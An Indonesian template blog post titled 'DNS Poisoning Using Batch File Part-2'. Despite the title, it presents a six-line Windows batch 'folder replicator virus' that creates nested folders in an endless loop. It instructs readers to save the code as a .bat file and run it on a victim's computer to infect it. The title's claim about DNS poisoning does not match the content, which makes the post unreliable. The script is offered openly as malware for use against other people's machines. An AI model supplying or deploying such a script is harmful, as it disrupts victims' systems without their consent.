Jumlah Pengunjung

DNS POISONING USING BATCH FILE PART-2

akatog007 0 comments
DNS POISONING USING BATCH FILE PART-2 - Hallo sahabat Jual DVD game HD android dan Tutorial oprek android, Pada Artikel yang anda baca kali ini dengan judul DNS POISONING USING BATCH FILE PART-2, kami telah mempersiapkan artikel ini dengan baik untuk anda baca dan ambil informasi didalamnya. mudah-mudahan isi postingan Artikel Batch File Viruses, yang kami tulis ini dapat anda pahami. baiklah, selamat membaca.

Judul : DNS POISONING USING BATCH FILE PART-2
link : DNS POISONING USING BATCH FILE PART-2

Baca juga


DNS POISONING USING BATCH FILE PART-2

DNS POISONING USING BATCH FILE PART-2
DNS POISONING USING BATCH FILE PART-2
Batch program offers its programmers to create their custom viruses just by misusing the way the command works, which leads to the creation of batch viruses. In this chapter we are going to learn about the dark-side of the batch by learning how to misuse commands to create batch viruses.


Folder Replicator Virus:

Here is a Simple batch virus that contains only 6 lines, has the tendency to replicate itself again and again and keeps on creating a folder with same name, until a user stops it.

1. Just open up a notepad, copy and paste the below code

cd\

cd C:\Documents and Settings\username\Desktop

:loop

md Virus

cd Virus

goto loop

2. Save it as a batch file with the extension .bat, before doing that you have to modify the code by changing the place where it says ‘username’ and instead of that replace it by the currently logged in username.

3. Then run it on the Victims computer to infect it.

4. Any how it doesn’t cause much harm, but replicates folder inside a folder and goes on.

Once more thing that you have to notice is that, this will create directory inside another directory with the same name, so it doesn’t looks like crap, since everything reside inside one main directory, more over deleting the root directory will purge all the clumsy thing done by this piece of code.


Demikianlah Artikel DNS POISONING USING BATCH FILE PART-2

Sekianlah artikel DNS POISONING USING BATCH FILE PART-2 kali ini, mudah-mudahan bisa memberi manfaat untuk anda semua. baiklah, sampai jumpa di postingan artikel lainnya.

Anda sekarang membaca artikel DNS POISONING USING BATCH FILE PART-2 dengan alamat link https://codecrot.blogspot.com/2016/06/dns-poisoning-using-batch-file-part-2.html
Google+ Pinterest

0 Response to "DNS POISONING USING BATCH FILE PART-2"

  • Commented politely and wisely in accordance with the content.
  • Comments are not needed by other readers [spam] will be removed immediately.
  • If the article entitled "DNS POISONING USING BATCH FILE PART-2" is useful, share to social networks.
Code Conversion